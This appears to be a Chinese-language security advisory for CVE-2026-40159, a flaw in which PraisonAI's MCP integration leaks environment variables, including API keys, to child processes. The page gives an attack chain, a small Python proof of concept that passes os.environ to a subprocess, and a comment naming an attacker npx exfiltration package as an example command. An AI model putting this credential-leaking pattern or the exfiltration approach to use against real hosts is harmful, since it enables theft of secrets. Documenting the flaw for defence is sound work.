CVE-2026-40159 CVSS 5.5 中危

CVE-2026-40159 PraisonAI敏感信息泄露漏洞

披露日期: 2026-04-10

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-40159

漏洞类型

敏感信息泄露

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

PraisonAI

漏洞概述

PraisonAI在4.5.128版本之前存在安全漏洞。其MCP集成允许通过用户提供的命令生成后台服务器，并通过subprocess模块执行。默认情况下，该实现会将父进程的所有环境变量（包括API密钥、认证令牌等敏感数据）继承到子进程中。当执行不受信任的第三方命令时，攻击者可利用此行为窃取主机环境中的敏感凭据，导致信息泄露。

技术细节

该漏洞源于PraisonAI在处理MCP（Model Context Protocol）集成时的环境变量继承机制。系统使用Python的`subprocess`模块执行用户提供的命令（如`npx -y ...`）。在创建子进程时，代码未对环境变量进行过滤，直接继承了父进程的全部环境上下文。这意味着，当用户调用包含外部或潜在恶意包的MCP工具时，这些恶意代码可以在拥有宿主机完整环境变量权限的上下文中运行。攻击者可以通过构造包含恶意Payload的命令，利用`npx -y`等包管理器自动执行特性，使恶意代码获取并窃取系统中的API密钥、数据库凭证等敏感信息，从而实施供应链攻击。

攻击链分析

STEP 1

步骤1

攻击者诱导受害者使用包含恶意代码的MCP工具或命令（如通过npx调用）。

STEP 2

步骤2

PraisonAI接收命令并通过Python subprocess模块创建子进程执行。

STEP 3

步骤3

由于漏洞，子进程自动继承了父进程的完整环境变量，包括敏感凭证。

STEP 4

步骤4

恶意代码在子进程中运行，读取并将窃取的环境变量发送给攻击者。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import subprocess
import os

# Proof of Concept: Demonstrating environment variable leakage
# This simulates how the vulnerable application spawns a process.

# In a real scenario, an attacker controls 'user_command' (e.g., via MCP)
# Example: "npx -y @attacker/exfil-tool"
user_command = "env" # Using 'env' to safely demonstrate that vars are visible

print("[*] Simulating vulnerable subprocess execution...")

# Vulnerable behavior: Passing the full environment dictionary (os.environ)
# to the child process without sanitization.
try:
    # This mimics the vulnerable code path in PraisonAI < 4.5.128
    process = subprocess.Popen(
        user_command,
        shell=True,
        env=os.environ  # Vulnerability: Leaking all parent env vars
    )
    process.wait()
except Exception as e:
    print(f"Error: {e}")

# In an exploit, the command would be a malicious package that sends
# process.env (in Node.js) or os.environ (in Python) to a remote server.

影响范围

PraisonAI < 4.5.128

防御指南

临时缓解措施

建议用户在未升级前，避免在包含敏感环境变量的主机上执行不受信任的MCP命令。应尽量在隔离环境或容器中运行PraisonAI，并配置环境变量白名单，仅允许传递必要的非敏感变量。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表